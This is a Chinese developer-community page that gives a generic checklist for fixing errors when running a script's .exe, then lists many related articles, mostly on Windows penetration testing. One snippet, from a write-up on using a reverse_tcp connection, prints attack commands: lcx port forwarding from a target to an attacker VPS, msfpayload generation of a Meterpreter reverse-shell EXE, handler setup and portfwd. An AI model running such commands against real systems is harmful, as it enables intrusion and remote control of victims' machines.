开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

尝试执行我的脚本的exe时出现错误

当尝试执行一个脚本的.exe文件时出现错误，可能是由于以下几个原因导致的：

缺少依赖库：某些脚本可能依赖于特定的库或软件包。如果缺少这些依赖项，执行脚本时会出现错误。解决方法是安装所需的依赖库或软件包。
操作系统不兼容：某些脚本可能只能在特定的操作系统上运行，如果尝试在不兼容的操作系统上执行脚本，会出现错误。解决方法是确保脚本与操作系统兼容。
脚本语法错误：脚本中可能存在语法错误，导致执行时出现错误。解决方法是检查脚本语法并修复错误。
权限问题：执行脚本的用户可能没有足够的权限来运行脚本。解决方法是以管理员身份运行脚本或调整文件权限。
病毒或恶意软件：脚本文件可能被病毒或恶意软件感染，导致执行时出现错误。解决方法是使用安全软件进行扫描并清除恶意软件。

对于解决这个问题，可以尝试以下步骤：

检查错误消息：查看错误消息以获取更多详细信息，这有助于确定问题的根本原因。
确认脚本完整性：确保脚本文件没有损坏或被篡改。可以通过重新下载脚本文件或使用文件校验工具来验证文件完整性。
检查依赖项：查看脚本的文档或说明，确定是否需要安装特定的依赖库或软件包。根据需要安装所需的依赖项。
检查操作系统兼容性：确认脚本支持的操作系统版本，并确保当前操作系统与脚本兼容。
检查脚本语法：使用适当的编辑工具检查脚本语法，并修复任何语法错误。
检查权限：以管理员身份运行脚本，或者确保当前用户具有足够的权限来执行脚本。

如果问题仍然存在，可以尝试在相关的开发者社区或论坛上寻求帮助，提供更多详细信息以便其他开发者能够更好地理解和解决问题。

腾讯云相关产品和产品介绍链接地址：

云服务器（CVM）：提供可扩展的计算能力，支持多种操作系统。详情请参考：https://cloud.tencent.com/product/cvm
云函数（SCF）：无服务器计算服务，可按需运行代码。详情请参考：https://cloud.tencent.com/product/scf
云数据库 MySQL 版（CDB）：可扩展的关系型数据库服务。详情请参考：https://cloud.tencent.com/product/cdb
云存储（COS）：安全可靠的对象存储服务。详情请参考：https://cloud.tencent.com/product/cos
人工智能平台（AI）：提供多种人工智能服务和工具，如图像识别、语音识别等。详情请参考：https://cloud.tencent.com/product/ai

相关搜索:尝试通过SSHHook执行远程脚本时出现气流错误执行exe时出现未知的发布者错误尝试使用ragtime迁移完全正常的SQL脚本时出现执行错误无法执行我的脚本时，它转换为exe 尝试执行IF语句时出现Shell错误运行我的脚本时出现GetEnumerator错误尝试执行Pig拉丁脚本时出现异常设置要执行的变量脚本路径时出现Bash脚本错误执行#expect脚本时出现无效的命令错误'mkdir‘执行全局安装的项目时出现Windows脚本错误当我尝试执行pip安装时，出现错误执行python脚本时出现的问题执行exe文件时出现错误。“原因:系统找不到指定的文件”尝试执行环境变量的值时出现分段错误尝试在Tableau中执行连接时出现错误尝试从SAS url执行Azcopy时出现错误尝试执行Pytorch代码时出现Win错误5 尝试执行存储过程循环时出现错误- MySQL 尝试使用Axios执行get时出现getState错误尝试执行Jetty Server时出现处理程序错误

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Metasploit、powershell之Windows错误系统配置漏洞实战提权

01 引言我们在获得目标机一个普通的权限时，除了常规提权方法外，还可以通过查找目标主机错误的系统配置和漏洞来获取系统权限。本节所讲的“Trusted Service Paths（可信任服务路径）漏洞

metasploit、powershell之Windows错误系统配置漏洞实战提权

我们在获得目标机一个普通的权限时，除了常规提权方法外，还可以通过查找目标主机错误的系统配置和漏洞来获取系统权限。本节所讲的“Trusted Service Paths（可信任服务路径）漏洞”和“系统服务的错误权限配置漏洞”绝对是你值得尝试的一个环节。

03

python 使用cx-freeze打包程序的实现

先尝试了PyInstaller ，打包时一直提示 no module named gtk 而gtk 又依赖pygobject ，尝试安装几次之后失败放弃

03

EmmyLua Attach Debugger浅析

最近一段时间做的工作主要是为引擎提供Lua的IDE，包括编辑智能提示和调试部分。

01

渗透技巧 | Bypass Powershell执行策略的N种方式

1.是Windows原生的2.可以调用Windows API3.无文件执行命令4.可以逃避Anti-Virus的检测(这个其实现在还比较敏感了)5.被大多数程序加入白名单中，标记为可信的6.有许多开源的渗透工具集

02

windows提权看这一篇就够了

windows在日常的渗透中经常遇到，而在内网之前，经常会在所拿到的跳板机进行提权，这样后面横向，内网才能更好的展开（抓hash，必须得系统或管理员权限），所以这里做了一次window提权总结，建议收藏，反复看，熟能生巧！

02

windows提权看这一篇就够了

windows在日常的渗透中经常遇到，而在内网之前，经常会在所拿到的跳板机进行提权，这样后面横向，内网才能更好的展开（抓hash，必须得系统或管理员权限），所以这里做了一次window提权总结，建议收藏，反复看，熟能生巧！

03

Slackor：Go语言写的一款C&C服务器

这将执行InvokeWebRequest（PS v.3 +）以下载payload，使用LOLBin执行它

01

干货 | 网络安全之渗透实战学习笔记总结

利用burp编码爆破Basic Authorization认证、smb连接的多种方法、windows用户的NTLM值破解方法、evil-winrm的运用、windows主机信息收集工具、msf运行powershell脚本、远程运行powershell脚本、PrintNightmare漏洞提权等多个知识点。

02

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

IPC$ (Internet Process Connection) 是共享“命名管道”的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT2000在提供了 IPC$ 共享功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(C$、D$、E$……)和系统目录共享(Admin$)。所有的这些初衷都是为了方便管理员的管理。但好的初衷并不一定有好的收效，一些别有用心者会利用IPC$，访问共享资源，导出用户列表，并使用一些字典工具，进行密码探测。

05

如何利用虚假浏览器更新渗透MikroTik路由器实验

MikroTik是拉脱维亚一家从事路由器和无线ISP系统开发的企业，在过去几个月中处理了许多影响其产品操作系统的漏洞。2018年4月，研究人员发现RouterOS的一个关键漏洞，攻击一直在以惊人的速度发生，当发现一种新发现的CVE-2018-14847开发技术时，情况更糟。问题在于，尽管供应商提供了安全修复程序，但大量的MikroTik路由器仍然没有打补丁并成为自动攻击的牺牲品。犯罪分子迅速利用概念证明代码在短时间内破坏数十万台设备。

02

UE4命令行编译工程入门

笔者是个UE4的小白，本文主要记录了一个小白是如何从零UE4的基础，一步步在命令行打出iOS的ipa包的尝试过程，本文比较浅，适合小白做为UE4工程的入门资料（UE大神可自动忽略本文）;

03

[系统安全] 十八.病毒攻防机理及WinRAR恶意劫持漏洞(bat病毒、自启动、蓝屏攻击)

作者前文介绍了Windows PE病毒，包括PE病毒原理、分类及感染方式详解；这篇文章将讲解简单的病毒原理和防御知识，并通过批处理代码和漏洞（CVE-2018-20250）利用让大家感受下病毒攻击的过程，包括自动启、修改密码、定时关机、蓝屏、进程关闭等功能，同时提出了安全相关建议。这些基础性知识不仅和系统安全相关，同样与我们身边常用的软件、操作系统紧密联系，希望这些知识对您有所帮助，更希望大家提高安全意识，安全保障任重道远。本文参考了参考文献中的文章（尤其感谢千峰教育史密斯老师 [峰哥]），并结合自己的经验和实践进行撰写，也推荐大家阅读参考文献。

06

reverse_tcp反向连接在实战中的应用

0x02 reverse_tcp实战应用过程 (1) 前期测试试了些已公布的2008提权EXP，不过都失败了，第三方软件也只找到一个Filezilla Server。先把C:\Program Files (x86)\FileZilla Server文件夹打包到我们本地，然后再用lcx把Filezilla Server的14147端口转发出来，lcx执行命令如下。首先VPS机器监听51端口，连接用14147端口： VPS机器执行： C:\>lcx.exe -listen 51 14147 目标机器执行： /c C:\aspSmartUpload\lcx.exe -slave {公网VPS IP} 51 127.0.0.1 14147 lcx转发了FileZilla Server的14147端口后还是连接不上，返回右上图这样的报错，Google翻译报错信息得知：协议错误：未通过身份验证，关闭连接，连接到服务器关闭。使用netstat -ano命令查看当前网络连接状态如下。 TCP 9*.1*9.4.1*3:139 0.0.0.0:0 LISTENING 4 TCP 9*.1*9.4.1*3:54133 1*3.2*1.*7.1*8:51 ESTABLISHED 2028 TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 1040 TCP 127.0.0.1:14147 0.0.0.0:0 LISTENING 1088 TCP 127.0.0.1:14147 127.0.0.1:49160 ESTABLISHED 1088 TCP 127.0.0.1:49160 127.0.0.1:14147 ESTABLISHED 5736 可以看到我们已经与目标机器建立了一个完整TCP连接，而且我们本地机器也成功的返回了数据，但是好像返回的数据信息中有错误，如下图。当前问题：不能正常把目标服务器的FileZilla Server 14147端口给转发出来，返回数据中出错了，所以无法在本地连接上FileZilla Server服务端。解决办法：利用Metasploit工具里的reverse_tcp反向连接生成一个EXE攻击载荷文件，然后在Meterpreter会话中用portfwd命令进行端口转发即可。 (2) 实战应用如果我们自己也处于内网环境的情况下，那么就需要先在路由器里进行端口映射配置，然后再用reverse_tcp反向连接来生成一个EXE攻击载荷文件，命令如下。 root@devil:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST=1*3.2*1.*7.1*8 LPORT=12345 X > /media/sf_系统学习/test.exe 先把我们生成好的test.exe载荷文件上传至目标机器的可读/写目录下，然后进入到MSF完成所有必填的配置选项，执行命令如下。 use exploit/mutil/handler //加载监听模块 set PAYLOADY windows/x64/meterpreter/reverse_tcp //设置攻击载荷 set LHOST 192.168.1.4 //设置攻击者内网IP set LPORT 12345 //设置本地监听端口 exploit //exploit执行监听将必填配置选项完成后执行exploit命令进行监听，然后在WebShell执行C:\aspSmartUpload\test.exe载荷文件，如果成功的话就会返回一个reverse_tcp反向连接的会话。成功得到目标机器Meterpreter会话，然后直接使用portfwd命令进行端口转发即可，执行命令如下。 meterpreter > portfwd add -l 14147 -p 14147 -r 127.0.0.1 使用portfwd命令成功执行端口转发操作后，我们再来连接目标机器的FileZilla Server服务端看下是否能正常连接

02

Windows 系统提权方式汇总

在渗透测试中，提升自己的权限是经常遇到的问题，往往在渗透中最容易获取的权限就是一个webshell，如果网站是架设在Windows系统上的，这时就可能遇到这样的问题，还有一种情况是在做横向渗透的时候，收集到一些可以远程连接桌面的帐号，这是也需要，在实际的渗透中有很多的地方会需要这个操作，这个系列就主要介绍各种提权的方式。

03

用不同姿势复现 CVE-2018-8174 漏洞

日前，360 核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用 0day 漏洞的 APT 攻击，捕获到了全球首例利用浏览器 0day 漏洞的新型 Office 文档攻击，我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招，最终被黑客植入后门木马完全控制电脑。

00

ProLock 勒索软件分析

写在前面的话当各个组织正忙于应对全球疫情的时候，新一波的勒索软件攻击又悄悄开始了。这款名为ProLock的勒索软件，是2019年底出现的PwndLocker勒索软件的变种版本。PwndLocker的传播时间非常短，主要是因为很多用户发现解密文件所需的密钥可以从恶意软件本身来获取，这样就无需支付赎金了。但是，今年三月份出现的ProLock正好相反，因为目标用户在支付了赎金之后，接收到的却是一个存在问题的解密工具，而这个解密工具将会损坏目标用户设备中已被勒索软件加密的数据。这种错误可能与ProLock加密文

01

pyinstaller打包python项目

在日常工作中，基本都是直接执行python脚本，但最近有个项目，需要提供给外部使用，而使用者又完全没有编程基础，不太可能自己安装python，安装各种依赖，所以将python项目打包为exe程序就显得尤为必要。

01

Windows 提权

当我们通过webshell拿到一个普通用户的权限，由于是普通用户所以很多操作都会受限制。这就需要通过一定的方法将普通用户提权到更高权限的用户。

09

bind_tcp正向连接在实战中的应用

Date/time：2013年，早想写这篇文章了，由于最近一直很忙，拖了半个月才抽出时间来写，这篇文章主要记录的是我在一次提权过程中遇到的问题和解决办法，在这里特别感谢@烟神、@落寞两位大哥的耐心指导与讲解。这个站点使用Asp + Access，一个很普通的SQL注入漏洞，这里就不详细写了。

02

FireEye报告：揭露新型工控系统恶意软件TRITON

Mandiant最近针对中东某企业关键基础设施遭受的攻击事件进行了安全响应，攻击者通过部署特制的恶意软件来控制目标工业安全系统，由于工业安全系统具备对工控系统的紧急关闭功能，因此我们有足够信心断定，该恶意软件是攻击者针对工控系统的硬件破坏或突然关停而开发的。目前，我们把这种恶意软件命名为TRITON，攻击者利用TRITON攻击框架能与施耐德电气公司的Triconex安全仪表系统控制器（SIS）形成通信交互，尽管我们暂时还未追溯定位到实际的攻击者，但我们肯定该攻击事件的幕后黑手为国家支持型黑客。 TRIT

05

使用 WSHController/WSHRemote 对象的横向移动（IWSHController 和 IWSHRemote 接口）

重新发现旧技巧很有趣，尤其是在学习非常理想的关于所有可能的逃避技巧和隐身技术的知识的情况下，红队和蓝队都应该知道这些技巧。尤其是允许横向移动的技巧。

01

内网渗透基石篇--权限提升

在windows中，权限大概分为四种，分别是User、Administrator、System、TrustedInstallerTrus

06

AutoHotkey（续集）

在学习使用 AutoHotkey(AHK) 之前, 你需要下载它. 下载后, 你可能会需要安装它. 但这取决于你下载的版本. 对于本指南, 我们将使用安装版, 因为对于新手来说, 它最容易设置.

03

在windows中使用Oh My Posh美化你的终端PowerShell或WSL

Windows 终端是一个新式主机应用程序，它面向你喜爱的命令行 shell，如命令提示符、PowerShell和 bash（通过适用于 Linux的 Windows子系统 (WSL)）。它的主要功能包括多个选项卡、窗格、Unicode和 UTF-8 字符支持、GPU 加速文本呈现引擎，你还可用它来创建你自己的主题并自定义文本、颜色、背景和快捷方式。

01

AutoIt木马又一发：暗藏神秘照片

AutoIt是一个自动化的Windows界面交互的脚本语言，具有很高的灵活性和较低的学习曲线。由于AutoIt解释器本身属于合法程序，黑客可以把恶意代码藏在脚本文件中，从而灵活地创建恶意软件，在系统中没有独立进程存在，从而延长其存活周期。以下是一个从国外流传进来的AutoIt木马样本，代表着此类木马家族典型的攻击手法。样本信息 [AutoIt3.exe] 71D8F6D5DC35517275BC38EBCC815F9F [googleupdate.a3x] E58C5E3F461089CA9688D3A

09

手把手包教会_手把手地教是什么意思

Selenium是一个用于web自动化测试的框架，在使用Ajax请求数据的页面中，会出现 sign ,token等密钥，如果考虑去激活成功教程可能花费的精力较多，所以考虑借助使用Selenium框架来实现数据爬取。

02

常用Webshell管理工具上线利用方式

这篇文章我们主要介绍的是如何利用常用Webshell管理工具中的自定义代码执行功能来上线MSF，附带了中国蚁剑、冰蝎和哥斯拉的内存加载上线，实战渗透中如果遇到以下场景时可尝试文中方法绕过。

02

常见的远程执行命令方式整理

当我们已经获取了远程系统的凭证（明文密码或 hash）时，可以直接通过3389远程登录进去收集信息、进行下一步的渗透，但是这样做的话会在系统上留下我们的操作记录，而且有可能邂逅管理员。大部分情况下，一个cmdshell 已经可以满足我们继续渗透的需求，所以不到万不得已的时候最好不要远程桌面连接(mstsc)，而是通过远程执行命令的方式继续开展工作。本文整理了一些远程执行命令的姿势，测试环境如下：

01

Word漏洞CVE-2017-0199剖析，微软的补丁你装了吗？

前言近期，FireEye检测到了一种利用漏洞CVE-2017-0199的恶意OfficeRTF文档——本周早前FreeBuf也报道了这一漏洞，在无需启用Word宏的情况下，打开恶意RFT文档就可感染恶意程序。当用户打开嵌入了漏洞利用代码的恶意文档之后，这个漏洞将允许攻击者在目标设备中下载并执行一个包含PowerShell命令的Visual Basic脚本，而FireEye所发现的这个恶意Office文档正是利用了漏洞CVE-2017-0199来在受感染设备上下载并执行恶意Payload。目前，Fir

Chrome 在野零日漏洞

卡巴斯基安全防护是卡巴斯基产品的一部分，过去已成功检测到许多零日攻击。最近，为 Google的 Chrome 浏览器发现了一个未知的新漏洞。我们会立即将此情况报告给 Google Chrome 安全团队。在审核了我们提供的 PoC 之后，Google 确认存在零日漏洞并将其分配为 CVE-2019-13720。Google 已针对 Windows，Mac 和 Linux 发布了 Chrome 版本78.0.3904.87，我们建议所有 Chrome 用户尽快将其更新为最新版本！你可以点击此处阅读 Google 公告。

02

内网渗透｜谈谈HASH传递那些世人皆知的事

Pass The Hash 即哈希传递攻击，简称 PTH，该攻击方法通过找到与账户相关的密码散列值 NTLM Hash 来进行攻击的。由于在 Windows 系统 NTLM 认证的 TYPE 3 消息计算 Response 的时候，客户端是使用用户的 NTLM Hash 进行计算的，而不是用户密码进行计算的。因此在模拟用户登录或对访问资源的用户进行身份认证的时候，是不需要用户明文密码的，只需要用户 Hash。攻击者可以利用 NTLM HASH 直接远程登录目标主机或反弹 Shell。

02

[V&N2020 公开赛] Final Game

发现关键字the eighth circle of Hell，Google这个可以发现是和《神曲》有关，而且搜索到的第一条就是

01

解决pyinstaller 打包exe文件太大，用pipenv 缩小exe的问题

最近写一个小脚本，源代码200多行，引入了 openpyxl、requests库，写完打包exe之后居然有64MB的大小，真是奇了葩了。网上查找各位大神的做法，自己又动手填了N个坑之后，总算找到缩小exe文件的方法了，这种方法必须使用到pipenv，详细记录如下：

02

恶意软件分析–恶意宏

据观察，高级持久威胁（APT-C-35）小组总部设在印度，据观察，他们使用鱼叉式网络钓鱼电子邮件瞄准了巴基斯坦的政府和军事人员。该威胁组织已经存在了好几年，对南亚的政治和军事实体进行情报行动。这是APT演员对巴基斯坦政府发起的新一轮攻击。鉴于该地区与印度之间的历史紧张关系以及最近的地缘政治紧张局势加剧，对巴基斯坦政府的网络攻击继续发生也就不足为奇了。该小组还展示了在过去的运营中针对手机用户的能力。该组织在针对巴基斯坦商人时冒充了巴基斯坦国家银行。

01

Windows权限提升之AppLocker绕过

在这篇文章中，我们将讨论 AppLocker 绕过的主题，这可以被视为 Windows 权限升级的一步，因为 AppLocker 会填充我们执行传输到受害者的任何文件的所有尝试。

05

Windows提权的几种常用姿势

当获取主机权限时，我们总是希望可以将普通用户提升为管理员用户，以便获得高权限完全控制目标主机。Windows常用的提权方式有：内核提权、数据库提权、系统配置错误提权、组策略首选项提权、Bypass UAC提权、令牌窃取提权等姿势。

02

windows中实现python,redis服务自动重启（任务计划程序+bat脚本）

需求：银行电脑无法自动开机，只能通过应用相关服务每天自动重启的方式实现服务更新并且防止服务假死，内存过大等情况

02

pypy 打包_手机按键精灵脚本编写

我们可以在ArcGIS之外调用arcpy站点包运行python独立脚本，从而批量化任务提高工作效率。如果可以把做好的脚本打包成exe是不是就更方便了呢？想想一键式处理也挺开心的。

02

Python源文件打包成可执行的exe应用，给你的代码变个身！

我们平常所写的程序一般都是在编译环境下运行的，然而这对于那些没有开发环境或者对程序一无所知的小白就很不友好了，

02

技术分享-持久性-WMI事件订阅

Windows Management Instrumentation (WMI) 使系统管理员能够在本地和远程执行任务。从红队的角度来看，WMI 可用于执行多种活动，例如横向移动、持久性、态势感知、代码执行以及作为命令和控制(C2)。WMI 是几乎所有 Windows 操作系统（Windows 98-Windows 10）中都存在的 Windows 的一部分，这一事实使这些攻击性活动远离蓝队的雷达。

01

对Python源码加密及反编译前后对比

目前软件开发商对 Python 加密时可能会有两种形式，一种是对python转成的exe进行

02

计划任务的攻防战 | Window 应急响应

一些安全研究员发现，通过修改创建的计划任务的注册表，同时删除计划任务文件，可以完全隐藏计划任务，并且执行不受影响

01

记一次渗透实战

趁nmap还在工作的时候，简单浏览了下网站的功能，伪静态，整个网站也没有什么动态功能

04

Python 脚本：如何一键登陆或开机自动登录公共区域的 WIFI？

我们都知道，wifi 有自动连接的功能，只要设备出现在 wifi 覆盖的区域之内，wifi 即会自动连接。这个自动登陆的机制在人数少的情况下完全没有问题，但在人多的公共场合，可能便会导致路由器因为连接负荷过大而产生信号资源浪费（每个路由器可供连接的设备都是有限的）。为此，在大型公共场合，例如校园、图书馆等，一般用户在自动无密码连接上 wifi 以后，还会被要求输入用户名密码之类，登录之后才可以开启真正的网络连接。同时呢，使用实名帐号登录，也是信息监控的必要。

03

浅析无文件攻击

在信息安全领域中，“无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时，不会在目标主机的磁盘上写入任何的恶意文件，因此而得名“无文件攻击”。然而，为了更好地应对“无文件攻击”，我们必须深刻理解这种攻击方式的底层实现技术，这样才能帮助我们在特定的环境下部署更好的防御策略。

03

详解Ubuntu16.04启动器图标异常解决方法

在Ubuntu16.04中，将某个程序锁定到启动器后，偶尔会出现无法正常运行、不能正确输入中文等问题。这里以SQLyog为例，总结一些常见问题和解决方法。

04

解决cx_Freeze打包出错importError:can not import name idnadata

在使用Python进行开发时，我们经常会用到一些打包工具来将我们的代码打包成可执行文件，以方便程序的发布和部署。其中，cx_Freeze是一个常用的打包工具之一。然而，有时在使用cx_Freeze进行打包时，可能会遇到importError: can not import name idnadata的错误。

03

横向渗透之 [RDP]

也可以通过reg配置文件的方式启动：regedit /s startrdp.reg

01

Window权限维持（四）：快捷方式

Windows快捷方式包含对系统上安装的软件或文件位置（网络或本地）的引用。自从恶意软件出现之初，便已将快捷方式用作执行恶意代码以实现持久性的一种方法。快捷方式的文件扩展名是.LNK，它为红队提供了很多机会来执行各种格式的代码（exe，vbs，Powershell，scriptlet等）或窃取NTLM哈希值。更隐蔽的方法是修改现有合法快捷方式的属性，但是生成具有不同特征的快捷方式可以为代码执行提供灵活性。

03

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭